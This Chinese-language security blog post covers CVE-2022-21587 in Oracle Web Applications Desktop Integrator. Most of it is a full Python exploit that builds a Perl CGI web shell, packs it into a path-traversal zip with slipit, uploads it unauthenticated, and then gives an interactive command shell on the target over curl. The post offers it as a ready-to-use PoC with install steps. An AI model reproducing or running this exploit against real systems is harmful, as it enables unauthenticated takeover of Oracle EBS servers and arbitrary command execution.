漏洞速递 | CVE-2022-21587漏洞(附EXP)
0x01 前言
CVE-2022-21587漏洞允许未经身份验证的攻击者通过 HTTP 进行网络访问,从而破坏 Oracle Web Applications Desktop Integrator。成功利用此漏洞可导致 Oracle Web Applications Desktop Integrator 被接管
需要安装python3 slipit依赖
安装 slipit:
1.git clone https://github.com/usdAG/slipit
2.cd slipit
3.python3 setup.py sdist
4.pip3 install --user dist/*
5.export PATH=/home/yourname/.local/bin:$PATH
0x02 Poc
POC内容,需要自行填充shell内容
#!/usr/bin/python3
#POC by HMs
#CVE-2022-21587
import requests
import os
import sys
shell = '''
use CGI;
print CGI::header( -type => 'text/plain' );
my $cmd = CGI::http('HTTP_CMD');
print system($cmd);
exit 0;
'''
def Write_Shell():
with open("txkFNDWRR.pl", "w") as f:
f.writelines("%s \n" %(shell))
os.system("slipit --overwrite --separator '/' --depth 5 --prefix '/FMW_Home/Oracle_EBS-app1/common/scripts/' txkFNDWRR.zip txkFNDWRR.pl")
os.system("uuencode txkFNDWRR.zip txkFNDWRR.zip > t.uue")
def exploit():
Write_Shell()
host = sys.argv[1]
if host.endswith == '/':
url = host + 'OA_HTML/BneUploaderService?bne:uueupload=true'
url_shell = host + '/OA_CGI/FNDWRR.exe'
else:
url = host + '/OA_HTML/BneUploaderService?bne:uueupload=true'
url_shell = host + '/OA_CGI/FNDWRR.exe'
file = 't.uue'
up = {
'text':(file,open(file, 'rb'),
"multipart/mixed"
)
}
request = requests.post(url,files=up)
if request.status_code == 200:
print('\n-----------------------------------\n[+] Exploiting .......\nShell has uploaded!\n-----------------------------------\n')
print('`press q || Q || quit to exit !!!` \n\n')
print('`exploit: python3 http|https://example.com` \n\n')
while True:
cmd = input("~shell[~]: ")
if cmd == 'q' or cmd == 'quit' or cmd == 'Q':
break
else:
os.system("curl -ks '%s' -H 'cmd: %s'" % (url_shell,cmd))
else:
print('not vuln!')
if __name__ == '__main__':
exploit()
0x03 漏洞分析参考
https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis?referrer=notificationEmail
项目地址:
https://github.com/hieuminhnv/CVE-2022-21587-POC
阅读建议
评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
